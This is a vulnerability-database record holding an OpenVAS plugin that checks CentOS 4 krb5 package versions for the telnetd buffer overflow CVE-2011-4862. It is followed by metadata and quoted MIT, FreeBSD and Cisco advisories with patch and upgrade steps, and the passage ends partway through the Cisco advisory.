CentOS Update for krb5-devel CESA-2011:1851 centos4
2012-07-30T00:00:00
ID OPENVAS:881380 Type openvas Reporter Copyright (c) 2012 Greenbone Networks GmbH Modified 2018-01-05T00:00:00
Description
Check for the Version of krb5-devel
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for krb5-devel CESA-2011:1851 centos4
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_insight = "Kerberos is a network authentication system which allows clients and
servers to authenticate to each other using symmetric encryption and a
trusted third- party, the Key Distribution Center (KDC).
A buffer overflow flaw was found in the MIT krb5 telnet daemon
(telnetd). A remote attacker who can access the telnet port of a
target machine could use this flaw to execute arbitrary code as
root. (CVE-2011-4862)
Note that the krb5 telnet daemon is not enabled by default in any
version of Red Hat Enterprise Linux. In addition, the default firewall
rules block remote access to the telnet port. This flaw does not
affect the telnet daemon distributed in the telnet-server package.
For users who have installed the krb5-workstation package, have
enabled the telnet daemon, and have it accessible remotely, this
update should be applied immediately.
All krb5-workstation users should upgrade to these updated packages,
which contain a backported patch to correct this issue.";
tag_affected = "krb5-devel on CentOS 4";
tag_solution = "Please Install the Updated Packages.";
if(description)
{
script_xref(name : "URL" , value : "http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html");
script_id(881380);
script_version("$Revision: 8295 $");
script_tag(name:"last_modification", value:"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $");
script_tag(name:"creation_date", value:"2012-07-30 17:37:55 +0530 (Mon, 30 Jul 2012)");
script_cve_id("CVE-2011-4862");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_xref(name: "CESA", value: "2011:1851");
script_name("CentOS Update for krb5-devel CESA-2011:1851 centos4 ");
script_tag(name: "summary" , value: "Check for the Version of krb5-devel");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2012 Greenbone Networks GmbH");
script_family("CentOS Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/centos", "ssh/login/rpms");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "insight" , value : tag_insight);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "CentOS4")
{
if ((res = isrpmvuln(pkg:"krb5-devel", rpm:"krb5-devel~1.3.4~65.el4", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"krb5-libs", rpm:"krb5-libs~1.3.4~65.el4", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"krb5-server", rpm:"krb5-server~1.3.4~65.el4", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"krb5-workstation", rpm:"krb5-workstation~1.3.4~65.el4", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"krb5", rpm:"krb5~1.3.4~65.el4", rls:"CentOS4")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:881380", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for krb5-devel CESA-2011:1851 centos4 ", "description": "Check for the Version of krb5-devel", "published": "2012-07-30T00:00:00", "modified": "2018-01-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=881380", "reporter": "Copyright (c) 2012 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html", "2011:1851"], "cvelist": ["CVE-2011-4862"], "lastseen": "2018-01-06T13:07:07", "viewCount": 1, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2018-01-06T13:07:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-1851", "CVE-2011-4862"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27599", "SECURITYVULNS:VULN:12120", "SECURITYVULNS:DOC:27503", "SECURITYVULNS:DOC:27502"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0056-1", "SUSE-SU-2012:0024-1", "OPENSUSE-SU-2012:0051-1"]}, {"type": "redhat", "idList": ["RHSA-2011:1851", "RHSA-2011:1852", "RHSA-2011:1853", "RHSA-2011:1854"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/FREEBSD/TELNET/TELNET_ENCRYPT_KEYID", "MSF:EXPLOIT/LINUX/TELNET/TELNET_ENCRYPT_KEYID", "MSF:AUXILIARY/SCANNER/TELNET/TELNET_ENCRYPT_OVERFLOW"]}, {"type": "exploitdb", "idList": ["EDB-ID:18368", "EDB-ID:18369", "EDB-ID:18280"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108199", "PACKETSTORM:108694", "PACKETSTORM:108198", "PACKETSTORM:108539"]}, {"type": "saint", "idList": ["SAINT:9BB5708972A26A51904B1BC21D31E721", "SAINT:2E667FA9EE1CC48C054B8BF1D1337065", "SAINT:4B6F19E604FCF1B28C3D4F6A458FF688"]}, {"type": "zdt", "idList": ["1337DAY-ID-22784"]}, {"type": "cisco", "idList": ["CISCO-SA-20120126-IRONPORT"]}, {"type": "centos", "idList": ["CESA-2011:1852", "CESA-2011:1851"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2373-1:B7CB7", "DEBIAN:DSA-2375-1:FD512", "DEBIAN:DSA-2372-1:C4E25"]}, {"type": "oraclelinux", "idList": ["ELSA-2011-1851", "ELSA-2011-1852"]}, {"type": "seebug", "idList": ["SSV:26112"]}, {"type": "freebsd", "idList": ["4DDC78DC-300A-11E1-A2AA-0016CE01E285"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2011-1851.NASL", "ORACLELINUX_ELSA-2011-1852.NASL", "CENTOS_RHSA-2011-1852.NASL", "ORACLELINUX_ELSA-2011-1851.NASL", "DEBIAN_DSA-2375.NASL", "FREEBSD_PKG_4DDC78DC300A11E1A2AA0016CE01E285.NASL", "CISCO-SA-20120126-ESA.NASL", "DEBIAN_DSA-2373.NASL", "SOLARIS11_TELNET_20120404.NASL", "FEDORA_2011-17493.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310881380", "OPENVAS:136141256231070691", "OPENVAS:1361412562310122016", "OPENVAS:1361412562310870526", "OPENVAS:870690", "OPENVAS:136141256231071180", "OPENVAS:870526", "OPENVAS:1361412562310103373", "OPENVAS:103373", "OPENVAS:1361412562310881314"]}, {"type": "gentoo", "idList": ["GLSA-201202-05"]}, {"type": "fedora", "idList": ["FEDORA:836D520F9D"]}], "modified": "2018-01-06T13:07:07", "rev": 2}, "vulnersScore": 8.6}, "pluginID": "881380", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for krb5-devel CESA-2011:1851 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Kerberos is a network authentication system which allows clients and\n servers to authenticate to each other using symmetric encryption and a\n trusted third- party, the Key Distribution Center (KDC).\n\n A buffer overflow flaw was found in the MIT krb5 telnet daemon\n (telnetd). A remote attacker who can access the telnet port of a\n target machine could use this flaw to execute arbitrary code as\n root. (CVE-2011-4862)\n \n Note that the krb5 telnet daemon is not enabled by default in any\n version of Red Hat Enterprise Linux. In addition, the default firewall\n rules block remote access to the telnet port. This flaw does not\n affect the telnet daemon distributed in the telnet-server package.\n \n For users who have installed the krb5-workstation package, have\n enabled the telnet daemon, and have it accessible remotely, this\n update should be applied immediately.\n \n All krb5-workstation users should upgrade to these updated packages,\n which contain a backported patch to correct this issue.\";\n\ntag_affected = \"krb5-devel on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-December/018360.html\");\n script_id(881380);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:37:55 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4862\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1851\");\n script_name(\"CentOS Update for krb5-devel CESA-2011:1851 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of krb5-devel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"krb5-devel\", rpm:\"krb5-devel~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-libs\", rpm:\"krb5-libs~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-server\", rpm:\"krb5-server~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5-workstation\", rpm:\"krb5-workstation~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"krb5\", rpm:\"krb5~1.3.4~65.el4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"cve": [{"lastseen": "2020-12-09T19:39:12", "description": "Buffer overflow in libtelnet/encrypt.c in telnetd in FreeBSD 7.3 through 9.0, MIT Kerberos Version 5 Applications (aka krb5-appl) 1.0.2 and earlier, Heimdal 1.5.1 and earlier, GNU inetutils, and possibly other products allows remote attackers to execute arbitrary code via a long encryption key, as exploited in the wild in December 2011.", "edition": 5, "cvss3": {}, "published": "2011-12-25T01:55:00", "title": "CVE-2011-4862", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4862"], "modified": "2017-08-29T01:30:00", "cpe": ["cpe:/o:freebsd:freebsd:8.2", "cpe:/o:freebsd:freebsd:7.3", "cpe:/a:h5l:heimdal:1.5.1", "cpe:/o:freebsd:freebsd:8.0", "cpe:/a:mit:krb5-appl:1.02", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:freebsd:freebsd:8.1"], "id": "CVE-2011-4862", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-4862", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:8.1:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:7.3:*:*:*:*:*:*:*", "cpe:2.3:o:freebsd:freebsd:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:h5l:heimdal:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mit:krb5-appl:1.02:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMITKRB5-SA-2011-008\r\n\r\nMIT krb5 Security Advisory 2011-008\r\nOriginal release: 2011-12-26\r\nLast update: 2011-12-26\r\n\r\nTopic: buffer overflow in telnetd\r\n\r\nCVE-2011-4862\r\n\r\nCVSSv2 Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C\r\n\r\nCVSSv2 Base Score: 10\r\n\r\nAccess Vector: Network\r\nAccess Complexity: Low\r\nAuthentication: None\r\nConfidentiality Impact: Complete\r\nIntegrity Impact: Complete\r\nAvailability Impact: Complete\r\n\r\nCVSSv2 Temporal Score: 8.3\r\n\r\nExploitability: Functional\r\nRemediation Level: Official Fix\r\nReport Confidence: Confirmed\r\n\r\nSUMMARY\r\n=======\r\n\r\nThe telnet daemon (telnetd) in MIT krb5 (and in krb5-appl after the\r\napplications were moved to a separate distribution for krb5-1.8) is\r\nvulnerable to a buffer overflow. The flaw does not require\r\nauthentication to exploit. Exploit code is reported to be actively\r\nused in the wild.\r\n\r\nIMPACT\r\n======\r\n\r\nAn unauthenticated remote attacker can cause a buffer overflow and\r\nprobably execute arbitrary code with the privileges of the telnet\r\ndaemon (normally root).\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* The telnet daemon in all releases of MIT krb5 prior to krb5-1.8 is\r\n vulnerable. Later releases moved the telnet code to the krb5-appl\r\n distribution.\r\n\r\n* The telnet daemon in all releases of krb5-appl is vulnerable.\r\n\r\nFIXES\r\n=====\r\n\r\n* Workaround: Disable telnet and use a more secure remote login\r\n solution, such as SSH.\r\n\r\n* A future release of krb5-appl will fix this vulnerability.\r\n\r\n* Apply the following patch:\r\n\r\ndiff --git a/telnet/libtelnet/encrypt.c b/telnet/libtelnet/encrypt.c\r\nindex f75317d..b8d6cdd 100644\r\n- --- a/telnet/libtelnet/encrypt.c\r\n+++ b/telnet/libtelnet/encrypt.c\r\n@@ -757,6 +757,9 @@ static void encrypt_keyid(kp, keyid, len)\r\n int dir = kp->dir;\r\n register int ret = 0;\r\n \r\n+ if (len > MAXKEYLEN)\r\n+ len = MAXKEYLEN;\r\n+\r\n if (!(ep = (*kp->getcrypt)(*kp->modep))) {\r\n if (len == 0)\r\n return;\r\n\r\n\r\n This patch is also available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2011-008-patch.txt\r\n\r\n A PGP-signed patch is available at\r\n\r\n http://web.mit.edu/kerberos/advisories/2011-008-patch.txt.asc\r\n\r\nREFERENCES\r\n==========\r\n\r\nThis announcement is posted at:\r\n\r\n http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-008.txt\r\n\r\nThis announcement and related security advisories may be found on the\r\nMIT Kerberos security advisory page at:\r\n\r\n http://web.mit.edu/kerberos/advisories/index.html\r\n\r\nThe main MIT Kerberos web page is at:\r\n\r\n http://web.mit.edu/kerberos/index.html\r\n\r\nCVSSv2:\r\n\r\n http://www.first.org/cvss/cvss-guide.html\r\n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\n\r\nCVE: CVE-2011-4862\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862\r\n\r\nhttp://lists.freebsd.org/pipermail/freebsd-security/2011-December/006117.html\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nWe became aware of this vulnerability through a FreeBSD security\r\nadvisory.\r\n\r\nCONTACT\r\n=======\r\n\r\nThe MIT Kerberos Team security contact address is\r\n<krbcore-security@mit.edu>. When sending sensitive information,\r\nplease PGP-encrypt it using the following key:\r\n\r\npub 2048R/56CD8F76 2010-12-29 [expires: 2012-02-01]\r\nuid MIT Kerberos Team Security Contact <krbcore-security@mit.edu>\r\n\r\nDETAILS\r\n=======\r\n\r\nIf the telnetd receives an ENCRYPT suboption that includes a key ID,\r\nencrypt_keyid() in libtelnet/encrypt.c copies the suboption contents\r\ninto a fixed-size static buffer without first constraining the length,\r\nleading to a buffer overflow.\r\n\r\nREVISION HISTORY\r\n================\r\n\r\n2011-12-26 original release\r\n\r\nCopyright (C) 2011 Massachusetts Institute of Technology\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (SunOS)\r\n\r\niEYEARECAAYFAk744dsACgkQSO8fWy4vZo6oOACdFW96Ei5AHXbXHBsHaax6tiEE\r\n8AIAoJjMKx/2cbcLiTlHYiN3ypy8XF4S\r\n=acqN\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27503", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27503", "title": "MITKRB5-SA-2011-008 buffer overflow in telnetd [CVE-2011-4862]", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "Buffer overflow in BSD telnetd / MIT krb5 telnetd is actively exploited in-the-wild.", "edition": 1, "modified": "2012-01-30T00:00:00", "published": "2012-01-30T00:00:00", "id": "SECURITYVULNS:VULN:12120", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12120", "title": "MIT / FreeBSD / Cisco telnetd buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n=============================================================================\r\nFreeBSD-SA-11:08.telnetd Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: telnetd code execution vulnerability\r\n\r\nCategory: core\r\nModule: contrib\r\nAnnounced: 2011-12-23\r\nAffects: All supported versions of FreeBSD.\r\nCorrected: 2011-12-23 15:00:37 UTC (RELENG_7, 7.4-STABLE)\r\n 2011-12-23 15:00:37 UTC (RELENG_7_4, 7.4-RELEASE-p5)\r\n 2011-12-23 15:00:37 UTC (RELENG_7_3, 7.3-RELEASE-p9)\r\n 2011-12-23 15:00:37 UTC (RELENG_8, 8.2-STABLE)\r\n 2011-12-23 15:00:37 UTC (RELENG_8_2, 8.2-RELEASE-p5)\r\n 2011-12-23 15:00:37 UTC (RELENG_8_1, 8.1-RELEASE-p7)\r\n 2011-12-23 15:00:37 UTC (RELENG_9, 9.0-STABLE)\r\n 2011-12-23 15:00:37 UTC (RELENG_9_0, 9.0-RELEASE)\r\nCVE Name: CVE-2011-4862\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:http://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nThe FreeBSD telnet daemon, telnetd(8), implements the server side of the\r\nTELNET virtual terminal protocol. It has been disabled by default in\r\nFreeBSD since August 2001, and due to the lack of cryptographic security\r\nin the TELNET protocol, it is strongly recommended that the SSH protocol\r\nbe used instead. The FreeBSD telnet daemon can be enabled via the\r\n/etc/inetd.conf configuration file and the inetd(8) daemon.\r\n\r\nThe TELNET protocol has a mechanism for encryption of the data stream\r\n(but it is not cryptographically strong and should not be relied upon\r\nin any security-critical applications).\r\n\r\nII. Problem Description\r\n\r\nWhen an encryption key is supplied via the TELNET protocol, its length\r\nis not validated before the key is copied into a fixed-size buffer.\r\n\r\nIII. Impact\r\n\r\nAn attacker who can connect to the telnetd daemon can execute arbitrary\r\ncode with the privileges of the daemon (which is usually the "root"\r\nsuperuser).\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available, but systems not running the telnet daemon\r\nare not vulnerable.\r\n\r\nNote that the telnet daemon is usually run via inetd, and consequently\r\nwill not show up in a process listing unless a connection is currently\r\nactive; to determine if it is enabled, run\r\n\r\n$ ps ax | grep telnetd | grep -v grep\r\n$ grep telnetd /etc/inetd.conf | grep -vE '^#'\r\n\r\nIf any output is produced, your system may be vulnerable.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to 7-STABLE or 8-STABLE, or to the\r\nRELENG_8_2, RELENG_8_1, RELENG_7_4, or RELENG_7_3 security branch dated\r\nafter the correction date.\r\n\r\n2) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to FreeBSD 7.4, 7.3,\r\n8.2, and 8.1 systems.\r\n\r\na) Download the patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch http://security.FreeBSD.org/patches/SA-11:08/telnetd.patch\r\n# fetch http://security.FreeBSD.org/patches/SA-11:08/telnetd.patch.asc\r\n\r\nb) Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n# cd /usr/src/lib/libtelnet\r\n# make obj && make depend && make && make install\r\n# cd /usr/src/libexec/telnetd\r\n# make obj && make depend && make && make install\r\n\r\n3) To update your vulnerable system via a binary patch:\r\n\r\nSystems running 7.4-RELEASE, 7.3-RELEASE, 8.2-RELEASE, or 8.1-RELEASE on\r\nthe i386 or amd64 platforms can be updated via the freebsd-update(8)\r\nutility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the revision numbers of each file that was\r\ncorrected in FreeBSD.\r\n\r\nCVS:\r\n\r\nBranch Revision\r\n Path\r\n- -------------------------------------------------------------------------\r\nRELENG_7\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.2.24.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.24.1\r\nRELENG_7_4\r\n src/UPDATING 1.507.2.36.2.7\r\n src/sys/conf/newvers.sh 1.72.2.18.2.10\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.2.38.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.40.2\r\nRELENG_7_3\r\n src/UPDATING 1.507.2.34.2.11\r\n src/sys/conf/newvers.sh 1.72.2.16.2.13\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.2.36.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.38.2\r\nRELENG_8\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.2.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.36.2\r\nRELENG_8_2\r\n src/UPDATING 1.632.2.19.2.7\r\n src/sys/conf/newvers.sh 1.83.2.12.2.10\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.8.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.36.1.6.2\r\nRELENG_8_1\r\n src/UPDATING 1.632.2.14.2.10\r\n src/sys/conf/newvers.sh 1.83.2.10.2.11\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.6.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.36.1.4.2\r\nRELENG_9\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.10.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.42.2\r\nRELENG_9_0\r\n src/crypto/heimdal/appl/telnet/libtelnet/encrypt.c 1.1.1.3.12.1\r\n src/contrib/telnet/libtelnet/encrypt.c 1.9.42.1.2.2\r\n- -------------------------------------------------------------------------\r\n\r\nSubversion:\r\n\r\nBranch/path Revision\r\n- -------------------------------------------------------------------------\r\nstable/7/ r228843\r\nreleng/7.4/ r228843\r\nreleng/7.3/ r228843\r\nstable/8/ r228843\r\nreleng/8.2/ r228843\r\nreleng/8.1/ r228843\r\nstable/9/ r228843\r\nreleng/9.0/ r228843\r\n- -------------------------------------------------------------------------\r\n\r\nVII. References\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4862\r\n\r\nThe latest revision of this advisory is available at\r\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-11:08.telnetd.asc\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.18 (FreeBSD)\r\n\r\niEYEARECAAYFAk70nOoACgkQFdaIBMps37IYcwCfXn5aQTfQDe/AnS31JBg+BB1m\r\nHJMAmgOE5pUKTlFqLw5UBouMNFfUmu2u\r\n=dcyj\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:DOC:27502", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27502", "title": "FreeBSD Security Advisory FreeBSD-SA-11:08.telnetd", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "cvelist": ["CVE-2011-4862"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\nCisco Security Advisory: Cisco IronPort Appliances Telnet Remote Code\r\nExecution Vulnerability\r\n\r\nAdvisory ID: cisco-sa-20120126-ironport\r\n\r\nRevision 1.0\r\n\r\nFor Public Release 2012 January 26 17:00 UTC (GMT)\r\n\r\n+--------------------------------------------------------------------\r\n\r\nSummary\r\n=======\r\n\r\nCisco IronPort Email Security Appliances (ESA) and Cisco IronPort\r\nSecurity Management Appliances (SMA) contain a vulnerability that may\r\nallow a remote, unauthenticated attacker to execute arbitrary code\r\nwith elevated privileges.\r\n\r\nWorkarounds that mitigate this vulnerability are available.\r\n\r\nThis advisory is available at the following link:\r\n\r\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport\r\n\r\nAffected Products\r\n=================\r\n\r\nVulnerable Products\r\n+------------------\r\n\r\nThe following Cisco IronPort Email Security Appliances (ESA) and\r\nCisco IronPort Security Management Appliances (SMA) are affected by\r\nthis vulnerability:\r\n\r\n * Cisco IronPort Email Security Appliance (C-Series and X-Series)\r\n versions prior to 7.6.0\r\n\r\n * Cisco IronPort Security Management Appliance (M-Series) versions\r\n prior to 7.8.0\r\n\r\n\r\nNote: Fixed software versions are not yet available. Please consult\r\nthe Obtaining Fixed Software section of this advisory for more\r\ninformation.\r\n\r\nProducts Confirmed Not Vulnerable\r\n+--------------------------------\r\n\r\nCisco IronPort Web Security Appliances (S-Series) are not affected by\r\nthis vulnerability. \r\n\r\nNo other Cisco products are currently known to be affected by this\r\nvulnerability.\r\n\r\nDetails\r\n=======\r\n\r\nThe Cisco IronPort ESA provides email management and protection\r\ncombining antispam, antivirus, encryption, digital rights management,\r\nand archiving technologies. The Cisco IronPort SMA is a flexible\r\nmanagement tool designed to centralize and consolidate policy and\r\nruntime data, providing a single management interface for multiple\r\nCisco IronPort security appliances.\r\n\r\nThe Cisco IronPort ESA and the Cisco IronPort SMA run AsyncOS, a\r\nmodified version of the FreeBSD kernel.\r\n\r\nThese devices are affected by the FreeBSD telnetd remote code\r\nexecution vulnerability documented by Common Vulnerabilities and\r\nExposures (CVE) identifier CVE-2011-4862. This vulnerability could\r\nallow a remote, unauthenticated attacker to run arbitrary code with\r\nelevated privileges.\r\n\r\nThe vulnerability is documented in Cisco IronPort bug 83262.\r\n\r\nNote: Cisco IronPort tracks bugs using an internal system that is not\r\navailable to customers. The Cisco IronPort bug tracking identifiers\r\nare provided for 